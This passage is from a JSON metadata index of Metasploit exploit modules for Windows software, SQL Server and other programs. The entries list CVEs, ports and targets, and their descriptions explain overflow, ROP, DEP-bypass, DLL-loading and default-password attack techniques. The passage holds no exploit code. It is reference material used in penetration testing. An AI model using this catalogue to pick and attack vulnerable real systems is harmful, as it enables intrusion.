"Realtek Media Player(RtlRack) A4.06 (XP Pro All English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/realtek_playlist.rb",
"is_install_path": true,
"ref_name": "windows/misc/realtek_playlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/sap_2005_license": {
"name": "SAP Business One License Manager 2005 Buffer Overflow",
"full_name": "exploit/windows/misc/sap_2005_license",
"rank": 500,
"disclosure_date": "2009-08-01",
"type": "exploit",
"author": [
"Jacopo Cervini"
],
"description": "This module exploits a stack buffer overflow in the SAP Business One 2005\n License Manager 'NT Naming Service' A and B releases. By sending an\n excessively long string the stack is overwritten enabling arbitrary\n code execution.",
"references": [
"OSVDB-56837",
"CVE-2009-4988",
"BID-35933",
"EDB-9319"
],
"platform": "Windows",
"arch": "",
"rport": 30000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Sap Business One 2005 B1 Universal"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/misc/sap_2005_license.rb",
"is_install_path": true,
"ref_name": "windows/misc/sap_2005_license",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/sap_netweaver_dispatcher": {
"name": "SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow",
"full_name": "exploit/windows/misc/sap_netweaver_dispatcher",
"rank": 300,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"Martin Gallo",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the SAP NetWeaver Dispatcher\n service. The overflow occurs in the DiagTraceR3Info() function and allows a remote\n attacker to execute arbitrary code by supplying a special crafted Diag packet. The\n Dispatcher service is only vulnerable if the Developer Traces have been configured\n at levels 2 or 3. The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).",
"references": [
"OSVDB-81759",
"CVE-2012-2611",
"BID-53424",
"EDB-20705",
"URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities",
"URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol"
],
"platform": "Windows",
"arch": "",
"rport": 3200,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3",
"SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb",
"is_install_path": true,
"ref_name": "windows/misc/sap_netweaver_dispatcher",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/shixxnote_font": {
"name": "ShixxNOTE 6.net Font Field Overflow",
"full_name": "exploit/windows/misc/shixxnote_font",
"rank": 500,
"disclosure_date": "2004-10-04",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.",
"references": [
"CVE-2004-1595",
"OSVDB-10721",
"BID-11409"
],
"platform": "Windows",
"arch": "",
"rport": 2000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ShixxNOTE 6.net Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/shixxnote_font.rb",
"is_install_path": true,
"ref_name": "windows/misc/shixxnote_font",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": {
"name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write",
"full_name": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write",
"rank": 400,
"disclosure_date": "2014-02-22",
"type": "exploit",
"author": [
"Mohamed Shetta <mshetta@live.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then uploading another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).",
"references": [
"CVE-2014-100015",
"EDB-31831",
"OSVDB-103671"
],
"platform": "Windows",
"arch": "",
"rport": 30000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)",
"SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb",
"is_install_path": true,
"ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/splayer_content_type": {
"name": "SPlayer 3.7 Content-Type Buffer Overflow",
"full_name": "exploit/windows/misc/splayer_content_type",
"rank": 300,
"disclosure_date": "2011-05-04",
"type": "exploit",
"author": [
"xsploitedsec <xsploitedsecurity@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in SPlayer v3.7 or prior. When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.",
"references": [
"OSVDB-72181",
"EDB-17243"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2/XP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/splayer_content_type.rb",
"is_install_path": true,
"ref_name": "windows/misc/splayer_content_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/stream_down_bof": {
"name": "CoCSoft StreamDown 6.8.0 Buffer Overflow",
"full_name": "exploit/windows/misc/stream_down_bof",
"rank": 400,
"disclosure_date": "2011-12-27",
"type": "exploit",
"author": [
"Fady Mohamed Osman <fady.mohamed.osman@gmail.com>"
],
"description": "This module exploits an SEH-based buffer overflow in CoCSoft StreamDown 6.8.0, triggered\n when processing the server response packet. During the overflow a structured exception\n handler is overwritten.",
"references": [
"CVE-2011-5052",
"OSVDB-78043",
"BID-51190",
"URL-http://www.dark-masters.tk/",
"URL-http://secunia.com/advisories/47343/",
"EDB-18283"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"StreamDown 6.8.0"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/stream_down_bof.rb",
"is_install_path": true,
"ref_name": "windows/misc/stream_down_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/talkative_response": {
"name": "Talkative IRC v0.4.4.16 Response Buffer Overflow",
"full_name": "exploit/windows/misc/talkative_response",
"rank": 300,
"disclosure_date": "2009-03-17",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.",
"references": [
"OSVDB-64582",
"BID-34141",
"EDB-8227"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/talkative_response.rb",
"is_install_path": true,
"ref_name": "windows/misc/talkative_response",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/tiny_identd_overflow": {
"name": "TinyIdentD 2.2 Stack Buffer Overflow",
"full_name": "exploit/windows/misc/tiny_identd_overflow",
"rank": 200,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Jacopo Cervini <acaro@jervus.it>"
],
"description": "This module exploits a stack based buffer overflow in TinyIdentD version 2.2.\n If we send a long string to the ident service we can overwrite the return\n address and execute arbitrary code. Credit to Maarten Boone.",
"references": [
"CVE-2007-2711",
"OSVDB-36053",
"BID-23981"
],
"platform": "Windows",
"arch": "",
"rport": 113,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows 2000 Server SP4 English",
"Windows XP SP2 Italian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb",
"is_install_path": true,
"ref_name": "windows/misc/tiny_identd_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/trendmicro_cmdprocessor_addtask": {
"name": "TrendMicro Control Manager CmdProcessor.exe Stack Buffer Overflow",
"full_name": "exploit/windows/misc/trendmicro_cmdprocessor_addtask",
"rank": 400,
"disclosure_date": "2011-12-07",
"type": "exploit",
"author": [
"Luigi Auriemma",
"Blue"
],
"description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manager up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.",
"references": [
"CVE-2011-5001",
"OSVDB-77585",
"ZDI-11-345"
],
"platform": "Windows",
"arch": "",
"rport": 20101,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 Server SP2 (DEP Bypass)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb",
"is_install_path": true,
"ref_name": "windows/misc/trendmicro_cmdprocessor_addtask",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/ufo_ai": {
"name": "UFO: Alien Invasion IRC Client Buffer Overflow",
"full_name": "exploit/windows/misc/ufo_ai",
"rank": 200,
"disclosure_date": "2009-10-28",
"type": "exploit",
"author": [
"Jason Geffner",
"dookie"
],
"description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.",
"references": [
"OSVDB-65689",
"EDB-14013"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/ufo_ai.rb",
"is_install_path": true,
"ref_name": "windows/misc/ufo_ai",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/vmhgfs_webdav_dll_sideload": {
"name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector",
"full_name": "exploit/windows/misc/vmhgfs_webdav_dll_sideload",
"rank": 300,
"disclosure_date": "2016-08-05",
"type": "exploit",
"author": [
"Yorick Koster"
],
"description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.",
"references": [
"CVE-2016-5330",
"URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html",
"URL-http://www.vmware.com/in/security/advisories/VMSA-2016-0010.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows x64",
"Windows x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb",
"is_install_path": true,
"ref_name": "windows/misc/vmhgfs_webdav_dll_sideload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/webdav_delivery": {
"name": "Serve DLL via webdav server",
"full_name": "exploit/windows/misc/webdav_delivery",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Ryan Hanson <ryan.hanson@optiv.com>",
"James Cook <james.cook@optiv.com>"
],
"description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotely and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. One named the requested name and one with a dll extension attached.",
"references": [
],
"platform": "Windows",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-12-12 13:26:46 +0000",
"path": "/modules/exploits/windows/misc/webdav_delivery.rb",
"is_install_path": true,
"ref_name": "windows/misc/webdav_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/windows_rsh": {
"name": "Windows RSH Daemon Buffer Overflow",
"full_name": "exploit/windows/misc/windows_rsh",
"rank": 200,
"disclosure_date": "2007-07-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.",
"references": [
"CVE-2007-4006",
"OSVDB-38572",
"BID-25044"
],
"platform": "Windows",
"arch": "",
"rport": 514,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2003 SP1 English",
"Windows XP Pro SP2 English",
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/windows_rsh.rb",
"is_install_path": true,
"ref_name": "windows/misc/windows_rsh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/wireshark_lua": {
"name": "Wireshark console.lua Pre-Loading Script Execution",
"full_name": "exploit/windows/misc/wireshark_lua",
"rank": 600,
"disclosure_date": "2011-07-18",
"type": "exploit",
"author": [
"Haifei Li",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8",
"references": [
"CVE-2011-3360",
"OSVDB-75347",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136",
"URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Wireshark 1.6.1 or less"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/misc/wireshark_lua.rb",
"is_install_path": true,
"ref_name": "windows/misc/wireshark_lua",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/misc/wireshark_packet_dect": {
"name": "Wireshark packet-dect.c Stack Buffer Overflow",
"full_name": "exploit/windows/misc/wireshark_packet_dect",
"rank": 400,
"disclosure_date": "2011-04-18",
"type": "exploit",
"author": [
"Paul Makowski",
"sickness",
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.",
"references": [
"CVE-2011-1591",
"OSVDB-71848",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836",
"EDB-17185"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win32 Universal (Generic DEP & ASLR Bypass)"
],
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb",
"is_install_path": true,
"ref_name": "windows/misc/wireshark_packet_dect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mmsp/ms10_025_wmss_connect_funnel": {
"name": "Windows Media Services ConnectFunnel Stack Buffer Overflow",
"full_name": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel",
"rank": 500,
"disclosure_date": "2010-04-13",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.",
"references": [
"CVE-2010-0478",
"OSVDB-63726",
"MSB-MS10-025",
"URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt"
],
"platform": "Windows",
"arch": "",
"rport": 1755,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro SP4 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb",
"is_install_path": true,
"ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/motorola/timbuktu_fileupload": {
"name": "Timbuktu Pro Directory Traversal/File Upload",
"full_name": "exploit/windows/motorola/timbuktu_fileupload",
"rank": 600,
"disclosure_date": "2008-05-10",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.",
"references": [
"CVE-2008-1117",
"OSVDB-43544"
],
"platform": "Windows",
"arch": "",
"rport": 407,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb",
"is_install_path": true,
"ref_name": "windows/motorola/timbuktu_fileupload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/lyris_listmanager_weak_pass": {
"name": "Lyris ListManager MSDE Weak sa Password",
"full_name": "exploit/windows/mssql/lyris_listmanager_weak_pass",
"rank": 600,
"disclosure_date": "2005-12-08",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.",
"references": [
"CVE-2005-4145",
"OSVDB-21559"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb",
"is_install_path": true,
"ref_name": "windows/mssql/lyris_listmanager_weak_pass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms02_039_slammer": {
"name": "MS02-039 Microsoft SQL Server Resolution Overflow",
"full_name": "exploit/windows/mssql/ms02_039_slammer",
"rank": 400,
"disclosure_date": "2002-07-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This is an exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a UDP packet to port 1434 which starts with 0x04 and\n is followed by a long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).",
"references": [
"CVE-2002-0649",
"OSVDB-4578",
"BID-5310",
"MSB-MS02-039"
],
"platform": "Windows",
"arch": "",
"rport": 1434,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"MSSQL 2000 / MSDE <= SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms02_039_slammer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms02_056_hello": {
"name": "MS02-056 Microsoft SQL Server Hello Overflow",
"full_name": "exploit/windows/mssql/ms02_056_hello",
"rank": 400,
"disclosure_date": "2002-08-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).",
"references": [
"CVE-2002-1123",
"OSVDB-10132",
"BID-5411",
"MSB-MS02-056"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"MSSQL 2000 / MSDE <= SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/mssql/ms02_056_hello.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms02_056_hello",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms09_004_sp_replwritetovarbin": {
"name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption",
"full_name": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin",
"rank": 400,
"disclosure_date": "2008-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.",
"references": [
"OSVDB-50589",
"CVE-2008-5416",
"BID-32710",
"MSB-MS09-004",
"EDB-7501"
],
"platform": "Windows",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic",
"MSSQL 2000 / MSDE SP0 (8.00.194)",
"MSSQL 2000 / MSDE SP1 (8.00.384)",
"MSSQL 2000 / MSDE SP2 (8.00.534)",
"MSSQL 2000 / MSDE SP3 (8.00.760)",
"MSSQL 2000 / MSDE SP4 (8.00.2039)",
"MSSQL 2005 SP0 (9.00.1399.06)",
"MSSQL 2005 SP1 (9.00.2047.00)",
"MSSQL 2005 SP2 (9.00.3042.00)",
"CRASHER"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/ms09_004_sp_replwritetovarbin_sqli": {
"name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",
"full_name": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli",
"rank": 600,
"disclosure_date": "2008-12-09",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>",
"Rodrigo Marcos"
],
"description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.",
"references": [
"OSVDB-50589",
"CVE-2008-5416",
"BID-32710",
"MSB-MS09-004",
"EDB-7501",
"URL-http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"MSSQL 2000 / MSDE SP0 (8.00.194)",
"MSSQL 2000 / MSDE SP1 (8.00.384)",
"MSSQL 2000 / MSDE SP2 (8.00.534)",
"MSSQL 2000 / MSDE SP3 (8.00.760)",
"MSSQL 2000 / MSDE SP4 (8.00.2039)",
"MSSQL 2005 SP0 (9.00.1399.06)",
"MSSQL 2005 SP1 (9.00.2047.00)",
"MSSQL 2005 SP2 (9.00.3042.00)",
"CRASHER"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb",
"is_install_path": true,
"ref_name": "windows/mssql/ms09_004_sp_replwritetovarbin_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_clr_payload": {
"name": "Microsoft SQL Server Clr Stored Procedure Payload Execution",
"full_name": "exploit/windows/mssql/mssql_clr_payload",
"rank": 600,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Lee Christensen",
"Nathan Kirk",
"OJ Reeves"
],
"description": "This module executes an arbitrary native payload on a Microsoft SQL\n server by loading a custom SQL CLR Assembly into the target SQL\n installation, and calling it directly with a base64-encoded payload.\n\n The module requires working credentials in order to connect directly to the\n MSSQL Server.\n\n This method requires the user to have sufficient privileges to install a custom\n SQL CLR DLL, and invoke the custom stored procedure that comes with it.\n\n This exploit does not leave any binaries on disk.\n\n Tested on MS SQL Server versions: 2005, 2012, 2016 (all x64).",
"references": [
"URL-http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/"
],
"platform": "Windows",
"arch": "x86, x64",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-10 14:15:39 +0000",
"path": "/modules/exploits/windows/mssql/mssql_clr_payload.rb",
"is_install_path": true,
"ref_name": "windows/mssql/mssql_clr_payload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/mssql/mssql_linkcrawler": {
"name": "Microsoft SQL Server Database Link Crawling Command Execution",
"full_name": "exploit/windows/mssql/mssql_linkcrawler",
"rank": 500,
"disclosure_date": "2000-01-01",
"type": "exploit",
"author": [
"Antti Rantasaari <antti.rantasaari@netspi.com>",
"Scott Sutherland \"nullbind\" <scott.sutherland@netspi.com>"
],
